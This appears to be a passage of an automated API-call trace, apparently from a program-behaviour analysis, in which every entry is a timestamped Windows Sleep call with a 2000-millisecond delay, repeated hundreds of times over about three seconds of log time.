Sleep (dwMilliseconds=0x7d0) [0239.363] Sleep (dwMilliseconds=0x7d0) [0239.369] Sleep (dwMilliseconds=0x7d0) [0239.375] Sleep (dwMilliseconds=0x7d0) [0239.377] Sleep (dwMilliseconds=0x7d0) [0239.380] Sleep (dwMilliseconds=0x7d0) [0239.382] Sleep (dwMilliseconds=0x7d0) [0239.383] Sleep (dwMilliseconds=0x7d0) [0239.389] Sleep (dwMilliseconds=0x7d0) [0239.395] Sleep (dwMilliseconds=0x7d0) [0239.396] Sleep (dwMilliseconds=0x7d0) [0239.402] Sleep (dwMilliseconds=0x7d0) [0239.403] Sleep (dwMilliseconds=0x7d0) [0239.409] Sleep (dwMilliseconds=0x7d0) [0239.411] Sleep (dwMilliseconds=0x7d0) [0239.423] Sleep (dwMilliseconds=0x7d0) [0239.425] Sleep (dwMilliseconds=0x7d0) [0239.426] Sleep (dwMilliseconds=0x7d0) [0239.432] Sleep (dwMilliseconds=0x7d0) [0239.434] Sleep (dwMilliseconds=0x7d0) [0239.440] Sleep (dwMilliseconds=0x7d0) [0239.442] Sleep (dwMilliseconds=0x7d0) [0239.448] Sleep (dwMilliseconds=0x7d0) [0239.456] Sleep (dwMilliseconds=0x7d0) [0239.469] Sleep (dwMilliseconds=0x7d0) [0239.477] Sleep (dwMilliseconds=0x7d0) [0239.481] Sleep (dwMilliseconds=0x7d0) [0239.484] Sleep (dwMilliseconds=0x7d0) [0239.486] Sleep (dwMilliseconds=0x7d0) [0239.504] Sleep (dwMilliseconds=0x7d0) [0239.513] Sleep (dwMilliseconds=0x7d0) [0239.514] Sleep (dwMilliseconds=0x7d0) [0239.520] Sleep (dwMilliseconds=0x7d0) [0239.529] Sleep (dwMilliseconds=0x7d0) [0239.530] Sleep (dwMilliseconds=0x7d0) [0239.536] Sleep (dwMilliseconds=0x7d0) [0239.537] Sleep (dwMilliseconds=0x7d0) [0239.544] Sleep (dwMilliseconds=0x7d0) [0239.545] Sleep (dwMilliseconds=0x7d0) [0239.551] Sleep (dwMilliseconds=0x7d0) [0239.552] Sleep (dwMilliseconds=0x7d0) [0239.558] Sleep (dwMilliseconds=0x7d0) [0239.559] Sleep (dwMilliseconds=0x7d0) [0239.567] Sleep (dwMilliseconds=0x7d0) [0239.575] Sleep (dwMilliseconds=0x7d0) [0239.580] Sleep (dwMilliseconds=0x7d0) [0239.582] Sleep (dwMilliseconds=0x7d0) [0239.584] Sleep (dwMilliseconds=0x7d0) [0239.589] Sleep (dwMilliseconds=0x7d0) [0239.596] Sleep (dwMilliseconds=0x7d0) [0239.598] Sleep (dwMilliseconds=0x7d0) [0239.604] Sleep (dwMilliseconds=0x7d0) [0239.611] Sleep (dwMilliseconds=0x7d0) [0239.618] Sleep (dwMilliseconds=0x7d0) [0239.623] Sleep (dwMilliseconds=0x7d0) [0239.626] Sleep (dwMilliseconds=0x7d0) [0239.628] Sleep (dwMilliseconds=0x7d0) [0239.635] Sleep (dwMilliseconds=0x7d0) [0239.636] Sleep (dwMilliseconds=0x7d0) [0239.643] Sleep (dwMilliseconds=0x7d0) [0239.644] Sleep (dwMilliseconds=0x7d0) [0239.650] Sleep (dwMilliseconds=0x7d0) [0239.657] Sleep (dwMilliseconds=0x7d0) [0239.658] Sleep (dwMilliseconds=0x7d0) [0239.664] Sleep (dwMilliseconds=0x7d0) [0239.667] Sleep (dwMilliseconds=0x7d0) [0239.668] Sleep (dwMilliseconds=0x7d0) [0239.673] Sleep (dwMilliseconds=0x7d0) [0239.674] Sleep (dwMilliseconds=0x7d0) [0239.680] Sleep (dwMilliseconds=0x7d0) [0239.687] Sleep (dwMilliseconds=0x7d0) [0239.689] Sleep (dwMilliseconds=0x7d0) [0239.694] Sleep (dwMilliseconds=0x7d0) [0239.701] Sleep (dwMilliseconds=0x7d0) [0239.702] Sleep (dwMilliseconds=0x7d0) [0239.709] Sleep (dwMilliseconds=0x7d0) [0239.710] Sleep (dwMilliseconds=0x7d0) [0239.712] Sleep (dwMilliseconds=0x7d0) [0239.717] Sleep (dwMilliseconds=0x7d0) [0239.719] Sleep (dwMilliseconds=0x7d0) [0239.725] Sleep (dwMilliseconds=0x7d0) [0239.726] Sleep (dwMilliseconds=0x7d0) [0239.732] Sleep (dwMilliseconds=0x7d0) [0239.733] Sleep (dwMilliseconds=0x7d0) [0239.739] Sleep (dwMilliseconds=0x7d0) [0239.745] Sleep (dwMilliseconds=0x7d0) [0239.746] Sleep (dwMilliseconds=0x7d0) [0239.752] Sleep (dwMilliseconds=0x7d0) [0239.769] Sleep (dwMilliseconds=0x7d0) [0239.775] Sleep (dwMilliseconds=0x7d0) [0239.776] Sleep (dwMilliseconds=0x7d0) [0239.782] Sleep (dwMilliseconds=0x7d0) [0239.791] Sleep (dwMilliseconds=0x7d0) [0239.798] Sleep (dwMilliseconds=0x7d0) [0239.799] Sleep (dwMilliseconds=0x7d0) [0239.805] Sleep (dwMilliseconds=0x7d0) [0239.807] Sleep (dwMilliseconds=0x7d0) [0239.813] Sleep (dwMilliseconds=0x7d0) [0239.814] Sleep (dwMilliseconds=0x7d0) [0239.825] Sleep (dwMilliseconds=0x7d0) [0239.827] Sleep (dwMilliseconds=0x7d0) [0239.833] Sleep (dwMilliseconds=0x7d0) [0239.835] Sleep (dwMilliseconds=0x7d0) [0239.841] Sleep (dwMilliseconds=0x7d0) [0239.843] Sleep (dwMilliseconds=0x7d0) [0239.849] Sleep (dwMilliseconds=0x7d0) [0239.855] Sleep (dwMilliseconds=0x7d0) [0239.861] Sleep (dwMilliseconds=0x7d0) [0239.863] Sleep (dwMilliseconds=0x7d0) [0239.864] Sleep (dwMilliseconds=0x7d0) [0239.872] Sleep (dwMilliseconds=0x7d0) [0239.880] Sleep (dwMilliseconds=0x7d0) [0239.888] Sleep (dwMilliseconds=0x7d0) [0239.889] Sleep (dwMilliseconds=0x7d0) [0239.897] Sleep (dwMilliseconds=0x7d0) [0239.898] Sleep (dwMilliseconds=0x7d0) [0239.906] Sleep (dwMilliseconds=0x7d0) [0239.907] Sleep (dwMilliseconds=0x7d0) [0239.915] Sleep (dwMilliseconds=0x7d0) [0239.922] Sleep (dwMilliseconds=0x7d0) [0239.928] Sleep (dwMilliseconds=0x7d0) [0239.930] Sleep (dwMilliseconds=0x7d0) [0239.936] Sleep (dwMilliseconds=0x7d0) [0239.942] Sleep (dwMilliseconds=0x7d0) [0239.944] Sleep (dwMilliseconds=0x7d0) [0239.949] Sleep (dwMilliseconds=0x7d0) [0239.951] Sleep (dwMilliseconds=0x7d0) [0239.957] Sleep (dwMilliseconds=0x7d0) [0239.959] Sleep (dwMilliseconds=0x7d0) [0239.965] Sleep (dwMilliseconds=0x7d0) [0239.966] Sleep (dwMilliseconds=0x7d0) [0239.974] Sleep (dwMilliseconds=0x7d0) [0239.981] Sleep (dwMilliseconds=0x7d0) [0239.982] Sleep (dwMilliseconds=0x7d0) [0239.989] Sleep (dwMilliseconds=0x7d0) [0239.994] Sleep (dwMilliseconds=0x7d0) [0239.997] Sleep (dwMilliseconds=0x7d0) [0240.004] Sleep (dwMilliseconds=0x7d0) [0240.005] Sleep (dwMilliseconds=0x7d0) [0240.010] Sleep (dwMilliseconds=0x7d0) [0240.017] Sleep (dwMilliseconds=0x7d0) [0240.018] Sleep (dwMilliseconds=0x7d0) [0240.025] Sleep (dwMilliseconds=0x7d0) [0240.026] Sleep (dwMilliseconds=0x7d0) [0240.055] Sleep (dwMilliseconds=0x7d0) [0240.061] Sleep (dwMilliseconds=0x7d0) [0240.063] Sleep (dwMilliseconds=0x7d0) [0240.064] Sleep (dwMilliseconds=0x7d0) [0240.070] Sleep (dwMilliseconds=0x7d0) [0240.073] Sleep (dwMilliseconds=0x7d0) [0240.079] Sleep (dwMilliseconds=0x7d0) [0240.080] Sleep (dwMilliseconds=0x7d0) [0240.086] Sleep (dwMilliseconds=0x7d0) [0240.087] Sleep (dwMilliseconds=0x7d0) [0240.093] Sleep (dwMilliseconds=0x7d0) [0240.094] Sleep (dwMilliseconds=0x7d0) [0240.101] Sleep (dwMilliseconds=0x7d0) [0240.102] Sleep (dwMilliseconds=0x7d0) [0240.107] Sleep (dwMilliseconds=0x7d0) [0240.111] Sleep (dwMilliseconds=0x7d0) [0240.119] Sleep (dwMilliseconds=0x7d0) [0240.120] Sleep (dwMilliseconds=0x7d0) [0240.127] Sleep (dwMilliseconds=0x7d0) [0240.134] Sleep (dwMilliseconds=0x7d0) [0240.135] Sleep (dwMilliseconds=0x7d0) [0240.142] Sleep (dwMilliseconds=0x7d0) [0240.150] Sleep (dwMilliseconds=0x7d0) [0240.152] Sleep (dwMilliseconds=0x7d0) [0240.154] Sleep (dwMilliseconds=0x7d0) [0240.160] Sleep (dwMilliseconds=0x7d0) [0240.161] Sleep (dwMilliseconds=0x7d0) [0240.169] Sleep (dwMilliseconds=0x7d0) [0240.170] Sleep (dwMilliseconds=0x7d0) [0240.179] Sleep (dwMilliseconds=0x7d0) [0240.180] Sleep (dwMilliseconds=0x7d0) [0240.189] Sleep (dwMilliseconds=0x7d0) [0240.197] Sleep (dwMilliseconds=0x7d0) [0240.198] Sleep (dwMilliseconds=0x7d0) [0240.206] Sleep (dwMilliseconds=0x7d0) [0240.214] Sleep (dwMilliseconds=0x7d0) [0240.216] Sleep (dwMilliseconds=0x7d0) [0240.224] Sleep (dwMilliseconds=0x7d0) [0240.225] Sleep (dwMilliseconds=0x7d0) [0240.232] Sleep (dwMilliseconds=0x7d0) [0240.240] Sleep (dwMilliseconds=0x7d0) [0240.241] Sleep (dwMilliseconds=0x7d0) [0240.249] Sleep (dwMilliseconds=0x7d0) [0240.251] Sleep (dwMilliseconds=0x7d0) [0240.259] Sleep (dwMilliseconds=0x7d0) [0240.267] Sleep (dwMilliseconds=0x7d0) [0240.277] Sleep (dwMilliseconds=0x7d0) [0240.284] Sleep (dwMilliseconds=0x7d0) [0240.292] Sleep (dwMilliseconds=0x7d0) [0240.294] Sleep (dwMilliseconds=0x7d0) [0240.301] Sleep (dwMilliseconds=0x7d0) [0240.308] Sleep (dwMilliseconds=0x7d0) [0240.316] Sleep (dwMilliseconds=0x7d0) [0240.325] Sleep (dwMilliseconds=0x7d0) [0240.326] Sleep (dwMilliseconds=0x7d0) [0240.329] Sleep (dwMilliseconds=0x7d0) [0240.335] Sleep (dwMilliseconds=0x7d0) [0240.336] Sleep (dwMilliseconds=0x7d0) [0240.355] Sleep (dwMilliseconds=0x7d0) [0240.357] Sleep (dwMilliseconds=0x7d0) [0240.363] Sleep (dwMilliseconds=0x7d0) [0240.364] Sleep (dwMilliseconds=0x7d0) [0240.372] Sleep (dwMilliseconds=0x7d0) [0240.373] Sleep (dwMilliseconds=0x7d0) [0240.381] Sleep (dwMilliseconds=0x7d0) [0240.383] Sleep (dwMilliseconds=0x7d0) [0240.385] Sleep (dwMilliseconds=0x7d0) [0240.389] Sleep (dwMilliseconds=0x7d0) [0240.391] Sleep (dwMilliseconds=0x7d0) [0240.398] Sleep (dwMilliseconds=0x7d0) [0240.406] Sleep (dwMilliseconds=0x7d0) [0240.407] Sleep (dwMilliseconds=0x7d0) [0240.415] Sleep (dwMilliseconds=0x7d0) [0240.416] Sleep (dwMilliseconds=0x7d0) [0240.423] Sleep (dwMilliseconds=0x7d0) [0240.425] Sleep (dwMilliseconds=0x7d0) [0240.429] Sleep (dwMilliseconds=0x7d0) [0240.432] Sleep (dwMilliseconds=0x7d0) [0240.434] Sleep (dwMilliseconds=0x7d0) [0240.440] Sleep (dwMilliseconds=0x7d0) [0240.448] Sleep (dwMilliseconds=0x7d0) [0240.450] Sleep (dwMilliseconds=0x7d0) [0240.456] Sleep (dwMilliseconds=0x7d0) [0240.457] Sleep (dwMilliseconds=0x7d0) [0240.464] Sleep (dwMilliseconds=0x7d0) [0240.465] Sleep (dwMilliseconds=0x7d0) [0240.474] Sleep (dwMilliseconds=0x7d0) [0240.475] Sleep (dwMilliseconds=0x7d0) [0240.479] Sleep (dwMilliseconds=0x7d0) [0240.487] Sleep (dwMilliseconds=0x7d0) [0240.488] Sleep (dwMilliseconds=0x7d0) [0240.496] Sleep (dwMilliseconds=0x7d0) [0240.498] Sleep (dwMilliseconds=0x7d0) [0240.506] Sleep (dwMilliseconds=0x7d0) [0240.507] Sleep (dwMilliseconds=0x7d0) [0240.515] Sleep (dwMilliseconds=0x7d0) [0240.521] Sleep (dwMilliseconds=0x7d0) [0240.524] Sleep (dwMilliseconds=0x7d0) [0240.526] Sleep (dwMilliseconds=0x7d0) [0240.532] Sleep (dwMilliseconds=0x7d0) [0240.533] Sleep (dwMilliseconds=0x7d0) [0240.540] Sleep (dwMilliseconds=0x7d0) [0240.541] Sleep (dwMilliseconds=0x7d0) [0240.547] Sleep (dwMilliseconds=0x7d0) [0240.555] Sleep (dwMilliseconds=0x7d0) [0240.557] Sleep (dwMilliseconds=0x7d0) [0240.563] Sleep (dwMilliseconds=0x7d0) [0240.566] Sleep (dwMilliseconds=0x7d0) [0240.570] Sleep (dwMilliseconds=0x7d0) [0240.571] Sleep (dwMilliseconds=0x7d0) [0240.578] Sleep (dwMilliseconds=0x7d0) [0240.585] Sleep (dwMilliseconds=0x7d0) [0240.592] Sleep (dwMilliseconds=0x7d0) [0240.593] Sleep (dwMilliseconds=0x7d0) [0240.600] Sleep (dwMilliseconds=0x7d0) [0240.607] Sleep (dwMilliseconds=0x7d0) [0240.609] Sleep (dwMilliseconds=0x7d0) [0240.614] Sleep (dwMilliseconds=0x7d0) [0240.615] Sleep (dwMilliseconds=0x7d0) [0240.621] Sleep (dwMilliseconds=0x7d0) [0240.622] Sleep (dwMilliseconds=0x7d0) [0240.628] Sleep (dwMilliseconds=0x7d0) [0240.629] Sleep (dwMilliseconds=0x7d0) [0240.635] Sleep (dwMilliseconds=0x7d0) [0240.636] Sleep (dwMilliseconds=0x7d0) [0240.642] Sleep (dwMilliseconds=0x7d0) [0240.643] Sleep (dwMilliseconds=0x7d0) [0240.651] Sleep (dwMilliseconds=0x7d0) [0240.654] Sleep (dwMilliseconds=0x7d0) [0240.658] Sleep (dwMilliseconds=0x7d0) [0240.660] Sleep (dwMilliseconds=0x7d0) [0240.667] Sleep (dwMilliseconds=0x7d0) [0240.668] Sleep (dwMilliseconds=0x7d0) [0240.675] Sleep (dwMilliseconds=0x7d0) [0240.683] Sleep (dwMilliseconds=0x7d0) [0240.685] Sleep (dwMilliseconds=0x7d0) [0240.690] Sleep (dwMilliseconds=0x7d0) [0240.692] Sleep (dwMilliseconds=0x7d0) [0240.697] Sleep (dwMilliseconds=0x7d0) [0240.699] Sleep (dwMilliseconds=0x7d0) [0240.700] Sleep (dwMilliseconds=0x7d0) [0240.706] Sleep (dwMilliseconds=0x7d0) [0240.713] Sleep (dwMilliseconds=0x7d0) [0240.714] Sleep (dwMilliseconds=0x7d0) [0240.721] Sleep (dwMilliseconds=0x7d0) [0240.722] Sleep (dwMilliseconds=0x7d0) [0240.728] Sleep (dwMilliseconds=0x7d0) [0240.735] Sleep (dwMilliseconds=0x7d0) [0240.736] Sleep (dwMilliseconds=0x7d0) [0240.743] Sleep (dwMilliseconds=0x7d0) [0240.744] Sleep (dwMilliseconds=0x7d0) [0240.750] Sleep (dwMilliseconds=0x7d0) [0240.752] Sleep (dwMilliseconds=0x7d0) [0240.758] Sleep (dwMilliseconds=0x7d0) [0240.759] Sleep (dwMilliseconds=0x7d0) [0240.765] Sleep (dwMilliseconds=0x7d0) [0240.766] Sleep (dwMilliseconds=0x7d0) [0240.772] Sleep (dwMilliseconds=0x7d0) [0240.779] Sleep (dwMilliseconds=0x7d0) [0240.781] Sleep (dwMilliseconds=0x7d0) [0240.787] Sleep (dwMilliseconds=0x7d0) [0240.788] Sleep (dwMilliseconds=0x7d0) [0240.794] Sleep (dwMilliseconds=0x7d0) [0240.795] Sleep (dwMilliseconds=0x7d0) [0240.801] Sleep (dwMilliseconds=0x7d0) [0240.802] Sleep (dwMilliseconds=0x7d0) [0240.808] Sleep (dwMilliseconds=0x7d0) [0240.810] Sleep (dwMilliseconds=0x7d0) [0240.816] Sleep (dwMilliseconds=0x7d0) [0240.822] Sleep (dwMilliseconds=0x7d0) [0240.824] Sleep (dwMilliseconds=0x7d0) [0240.829] Sleep (dwMilliseconds=0x7d0) [0240.831] Sleep (dwMilliseconds=0x7d0) [0240.834] Sleep (dwMilliseconds=0x7d0) [0240.836] Sleep (dwMilliseconds=0x7d0) [0240.843] Sleep (dwMilliseconds=0x7d0) [0240.850] Sleep (dwMilliseconds=0x7d0) [0240.852] Sleep (dwMilliseconds=0x7d0) [0240.857] Sleep (dwMilliseconds=0x7d0) [0240.859] Sleep (dwMilliseconds=0x7d0) [0240.865] Sleep (dwMilliseconds=0x7d0) [0240.866] Sleep (dwMilliseconds=0x7d0) [0240.872] Sleep (dwMilliseconds=0x7d0) [0240.874] Sleep (dwMilliseconds=0x7d0) [0240.879] Sleep (dwMilliseconds=0x7d0) [0240.883] Sleep (dwMilliseconds=0x7d0) [0240.889] Sleep (dwMilliseconds=0x7d0) [0240.896] Sleep (dwMilliseconds=0x7d0) [0240.897] Sleep (dwMilliseconds=0x7d0) [0240.902] Sleep (dwMilliseconds=0x7d0) [0240.904] Sleep (dwMilliseconds=0x7d0) [0240.910] Sleep (dwMilliseconds=0x7d0) [0240.911] Sleep (dwMilliseconds=0x7d0) [0240.917] Sleep (dwMilliseconds=0x7d0) [0240.919] Sleep (dwMilliseconds=0x7d0) [0240.924] Sleep (dwMilliseconds=0x7d0) [0240.926] Sleep (dwMilliseconds=0x7d0) [0240.931] Sleep (dwMilliseconds=0x7d0) [0240.933] Sleep (dwMilliseconds=0x7d0) [0240.938] Sleep (dwMilliseconds=0x7d0) [0240.940] Sleep (dwMilliseconds=0x7d0) [0240.945] Sleep (dwMilliseconds=0x7d0) [0240.947] Sleep (dwMilliseconds=0x7d0) [0240.952] Sleep (dwMilliseconds=0x7d0) [0240.960] Sleep (dwMilliseconds=0x7d0) [0240.961] Sleep (dwMilliseconds=0x7d0) [0240.967] Sleep (dwMilliseconds=0x7d0) [0240.968] Sleep (dwMilliseconds=0x7d0) [0240.972] Sleep (dwMilliseconds=0x7d0) [0240.976] Sleep (dwMilliseconds=0x7d0) [0240.983] Sleep (dwMilliseconds=0x7d0) [0240.989] Sleep (dwMilliseconds=0x7d0) [0240.996] Sleep (dwMilliseconds=0x7d0) [0241.002] Sleep (dwMilliseconds=0x7d0) [0241.010] Sleep (dwMilliseconds=0x7d0) [0241.011] Sleep (dwMilliseconds=0x7d0) [0241.016] Sleep (dwMilliseconds=0x7d0) [0241.017] Sleep (dwMilliseconds=0x7d0) [0241.026] Sleep (dwMilliseconds=0x7d0) [0241.042] Sleep (dwMilliseconds=0x7d0) [0241.049] Sleep (dwMilliseconds=0x7d0) [0241.050] Sleep (dwMilliseconds=0x7d0) [0241.055] Sleep (dwMilliseconds=0x7d0) [0241.061] Sleep (dwMilliseconds=0x7d0) [0241.067] Sleep (dwMilliseconds=0x7d0) [0241.069] Sleep (dwMilliseconds=0x7d0) [0241.075] Sleep (dwMilliseconds=0x7d0) [0241.076] Sleep (dwMilliseconds=0x7d0) [0241.077] Sleep (dwMilliseconds=0x7d0) [0241.084] Sleep (dwMilliseconds=0x7d0) [0241.090] Sleep (dwMilliseconds=0x7d0) [0241.091] Sleep (dwMilliseconds=0x7d0) [0241.097] Sleep (dwMilliseconds=0x7d0) [0241.098] Sleep (dwMilliseconds=0x7d0) [0241.103] Sleep (dwMilliseconds=0x7d0) [0241.105] Sleep (dwMilliseconds=0x7d0) [0241.110] Sleep (dwMilliseconds=0x7d0) [0241.111] Sleep (dwMilliseconds=0x7d0) [0241.116] Sleep (dwMilliseconds=0x7d0) [0241.118] Sleep (dwMilliseconds=0x7d0) [0241.123] Sleep (dwMilliseconds=0x7d0) [0241.129] Sleep (dwMilliseconds=0x7d0) [0241.130] Sleep (dwMilliseconds=0x7d0) [0241.135] Sleep (dwMilliseconds=0x7d0) [0241.137] Sleep (dwMilliseconds=0x7d0) [0241.142] Sleep (dwMilliseconds=0x7d0) [0241.149] Sleep (dwMilliseconds=0x7d0) [0241.155] Sleep (dwMilliseconds=0x7d0) [0241.161] Sleep (dwMilliseconds=0x7d0) [0241.162] Sleep (dwMilliseconds=0x7d0) [0241.167] Sleep (dwMilliseconds=0x7d0) [0241.168] Sleep (dwMilliseconds=0x7d0) [0241.175] Sleep (dwMilliseconds=0x7d0) [0241.176] Sleep (dwMilliseconds=0x7d0) [0241.182] Sleep (dwMilliseconds=0x7d0) [0241.184] Sleep (dwMilliseconds=0x7d0) [0241.189] Sleep (dwMilliseconds=0x7d0) [0241.196] Sleep (dwMilliseconds=0x7d0) [0241.198] Sleep (dwMilliseconds=0x7d0) [0241.203] Sleep (dwMilliseconds=0x7d0) [0241.210] Sleep (dwMilliseconds=0x7d0) [0241.213] Sleep (dwMilliseconds=0x7d0) [0241.217] Sleep (dwMilliseconds=0x7d0) [0241.218] Sleep (dwMilliseconds=0x7d0) [0241.224] Sleep (dwMilliseconds=0x7d0) [0241.230] Sleep (dwMilliseconds=0x7d0) [0241.239] Sleep (dwMilliseconds=0x7d0) [0241.240] Sleep (dwMilliseconds=0x7d0) [0241.245] Sleep (dwMilliseconds=0x7d0) [0241.246] Sleep (dwMilliseconds=0x7d0) [0241.252] Sleep (dwMilliseconds=0x7d0) [0241.253] Sleep (dwMilliseconds=0x7d0) [0241.257] Sleep (dwMilliseconds=0x7d0) [0241.259] Sleep (dwMilliseconds=0x7d0) [0241.266] Sleep (dwMilliseconds=0x7d0) [0241.268] Sleep (dwMilliseconds=0x7d0) [0241.273] Sleep (dwMilliseconds=0x7d0) [0241.275] Sleep (dwMilliseconds=0x7d0) [0241.316] Sleep (dwMilliseconds=0x7d0) [0241.317] Sleep (dwMilliseconds=0x7d0) [0241.323] Sleep (dwMilliseconds=0x7d0) [0241.330] Sleep (dwMilliseconds=0x7d0) [0241.331] Sleep (dwMilliseconds=0x7d0) [0241.337] Sleep (dwMilliseconds=0x7d0) [0241.338] Sleep (dwMilliseconds=0x7d0) [0241.352] Sleep (dwMilliseconds=0x7d0) [0241.353] Sleep (dwMilliseconds=0x7d0) [0241.359] Sleep (dwMilliseconds=0x7d0) [0241.365] Sleep (dwMilliseconds=0x7d0) [0241.373] Sleep (dwMilliseconds=0x7d0) [0241.378] Sleep (dwMilliseconds=0x7d0) [0241.379] Sleep (dwMilliseconds=0x7d0) [0241.384] Sleep (dwMilliseconds=0x7d0) [0241.388] Sleep (dwMilliseconds=0x7d0) [0241.392] Sleep (dwMilliseconds=0x7d0) [0241.393] Sleep (dwMilliseconds=0x7d0) [0241.400] Sleep (dwMilliseconds=0x7d0) [0241.405] Sleep (dwMilliseconds=0x7d0) [0241.407] Sleep (dwMilliseconds=0x7d0) [0241.414] Sleep (dwMilliseconds=0x7d0) [0241.428] Sleep (dwMilliseconds=0x7d0) [0241.434] Sleep (dwMilliseconds=0x7d0) [0241.442] Sleep (dwMilliseconds=0x7d0) [0241.443] Sleep (dwMilliseconds=0x7d0) [0241.449] Sleep (dwMilliseconds=0x7d0) [0241.450] Sleep (dwMilliseconds=0x7d0) [0241.456] Sleep (dwMilliseconds=0x7d0) [0241.462] Sleep (dwMilliseconds=0x7d0) [0241.464] Sleep (dwMilliseconds=0x7d0) [0241.470] Sleep (dwMilliseconds=0x7d0) [0241.476] Sleep (dwMilliseconds=0x7d0) [0241.478] Sleep (dwMilliseconds=0x7d0) [0241.485] Sleep (dwMilliseconds=0x7d0) [0241.486] Sleep (dwMilliseconds=0x7d0) [0241.492] Sleep (dwMilliseconds=0x7d0) [0241.500] Sleep (dwMilliseconds=0x7d0) [0241.506] Sleep (dwMilliseconds=0x7d0) [0241.508] Sleep (dwMilliseconds=0x7d0) [0241.513] Sleep (dwMilliseconds=0x7d0) [0241.520] Sleep (dwMilliseconds=0x7d0) [0241.521] Sleep (dwMilliseconds=0x7d0) [0241.523] Sleep (dwMilliseconds=0x7d0) [0241.527] Sleep (dwMilliseconds=0x7d0) [0241.534] Sleep (dwMilliseconds=0x7d0) [0241.535] Sleep (dwMilliseconds=0x7d0) [0241.541] Sleep (dwMilliseconds=0x7d0) [0241.546] Sleep (dwMilliseconds=0x7d0) [0241.548] Sleep (dwMilliseconds=0x7d0) [0241.553] Sleep (dwMilliseconds=0x7d0) [0241.554] Sleep (dwMilliseconds=0x7d0) [0241.560] Sleep (dwMilliseconds=0x7d0) [0241.561] Sleep (dwMilliseconds=0x7d0) [0241.568] Sleep (dwMilliseconds=0x7d0) [0241.569] Sleep (dwMilliseconds=0x7d0) [0241.575] Sleep (dwMilliseconds=0x7d0) [0241.582] Sleep (dwMilliseconds=0x7d0) [0241.589] Sleep (dwMilliseconds=0x7d0) [0241.590] Sleep (dwMilliseconds=0x7d0) [0241.598] Sleep (dwMilliseconds=0x7d0) [0241.605] Sleep (dwMilliseconds=0x7d0) [0241.606] Sleep (dwMilliseconds=0x7d0) [0241.612] Sleep (dwMilliseconds=0x7d0) [0241.620] Sleep (dwMilliseconds=0x7d0) [0241.621] Sleep (dwMilliseconds=0x7d0) [0241.627] Sleep (dwMilliseconds=0x7d0) [0241.629] Sleep (dwMilliseconds=0x7d0) [0241.634] Sleep (dwMilliseconds=0x7d0) [0241.636] Sleep (dwMilliseconds=0x7d0) [0241.641] Sleep (dwMilliseconds=0x7d0) [0241.643] Sleep (dwMilliseconds=0x7d0) [0241.649] Sleep (dwMilliseconds=0x7d0) [0241.655] Sleep (dwMilliseconds=0x7d0) [0241.658] Sleep (dwMilliseconds=0x7d0) [0241.662] Sleep (dwMilliseconds=0x7d0) [0241.663] Sleep (dwMilliseconds=0x7d0) [0241.669] Sleep (dwMilliseconds=0x7d0) [0241.670] Sleep (dwMilliseconds=0x7d0) [0241.676] Sleep (dwMilliseconds=0x7d0) [0241.678] Sleep (dwMilliseconds=0x7d0) [0241.683] Sleep (dwMilliseconds=0x7d0) [0241.685] Sleep (dwMilliseconds=0x7d0) [0241.691] Sleep (dwMilliseconds=0x7d0) [0241.698] Sleep (dwMilliseconds=0x7d0) [0241.700] Sleep (dwMilliseconds=0x7d0) [0241.704] Sleep (dwMilliseconds=0x7d0) [0241.706] Sleep (dwMilliseconds=0x7d0) [0241.708] Sleep (dwMilliseconds=0x7d0) [0241.713] Sleep (dwMilliseconds=0x7d0) [0241.715] Sleep (dwMilliseconds=0x7d0) [0241.721] Sleep (dwMilliseconds=0x7d0) [0241.727] Sleep (dwMilliseconds=0x7d0) [0241.728] Sleep (dwMilliseconds=0x7d0) [0241.735] Sleep (dwMilliseconds=0x7d0) [0241.736] Sleep (dwMilliseconds=0x7d0) [0241.742] Sleep (dwMilliseconds=0x7d0) [0241.743] Sleep (dwMilliseconds=0x7d0) [0241.748] Sleep (dwMilliseconds=0x7d0) [0241.749] Sleep (dwMilliseconds=0x7d0) [0241.756] Sleep (dwMilliseconds=0x7d0) [0241.763] Sleep (dwMilliseconds=0x7d0) [0241.764] Sleep (dwMilliseconds=0x7d0) [0241.770] Sleep (dwMilliseconds=0x7d0) [0241.777] Sleep (dwMilliseconds=0x7d0) [0241.784] Sleep (dwMilliseconds=0x7d0) [0241.786] Sleep (dwMilliseconds=0x7d0) [0241.791] Sleep (dwMilliseconds=0x7d0) [0241.793] Sleep (dwMilliseconds=0x7d0) [0241.800] Sleep (dwMilliseconds=0x7d0) [0241.802] Sleep (dwMilliseconds=0x7d0) [0241.807] Sleep (dwMilliseconds=0x7d0) [0241.809] Sleep (dwMilliseconds=0x7d0) [0241.815] Sleep (dwMilliseconds=0x7d0) [0241.822] Sleep (dwMilliseconds=0x7d0) [0241.824] Sleep (dwMilliseconds=0x7d0) [0241.829] Sleep (dwMilliseconds=0x7d0) [0241.831] Sleep (dwMilliseconds=0x7d0) [0241.837] Sleep (dwMilliseconds=0x7d0) [0241.839] Sleep (dwMilliseconds=0x7d0) [0241.843] Sleep (dwMilliseconds=0x7d0) [0241.845] Sleep (dwMilliseconds=0x7d0) [0241.852] Sleep (dwMilliseconds=0x7d0) [0241.861] Sleep (dwMilliseconds=0x7d0) [0241.862] Sleep (dwMilliseconds=0x7d0) [0241.870] Sleep (dwMilliseconds=0x7d0) [0241.871] Sleep (dwMilliseconds=0x7d0) [0241.877] Sleep (dwMilliseconds=0x7d0) [0241.879] Sleep (dwMilliseconds=0x7d0) [0241.883] Sleep (dwMilliseconds=0x7d0) [0241.884] Sleep (dwMilliseconds=0x7d0) [0241.886] Sleep (dwMilliseconds=0x7d0) [0241.891] Sleep (dwMilliseconds=0x7d0) [0241.898] Sleep (dwMilliseconds=0x7d0) [0241.903] Sleep (dwMilliseconds=0x7d0) [0241.905] Sleep (dwMilliseconds=0x7d0) [0241.910] Sleep (dwMilliseconds=0x7d0) [0241.912] Sleep (dwMilliseconds=0x7d0) [0241.920] Sleep (dwMilliseconds=0x7d0) [0241.927] Sleep (dwMilliseconds=0x7d0) [0241.929] Sleep (dwMilliseconds=0x7d0) [0241.935] Sleep (dwMilliseconds=0x7d0) [0241.944] Sleep (dwMilliseconds=0x7d0) [0241.945] Sleep (dwMilliseconds=0x7d0) [0241.951] Sleep (dwMilliseconds=0x7d0) [0241.960] Sleep (dwMilliseconds=0x7d0) [0241.966] Sleep (dwMilliseconds=0x7d0) [0241.968] Sleep (dwMilliseconds=0x7d0) [0241.973] Sleep (dwMilliseconds=0x7d0) [0241.975] Sleep (dwMilliseconds=0x7d0) [0241.980] Sleep (dwMilliseconds=0x7d0) [0241.986] Sleep (dwMilliseconds=0x7d0) [0241.988] Sleep (dwMilliseconds=0x7d0) [0241.994] Sleep (dwMilliseconds=0x7d0) [0241.995] Sleep (dwMilliseconds=0x7d0) 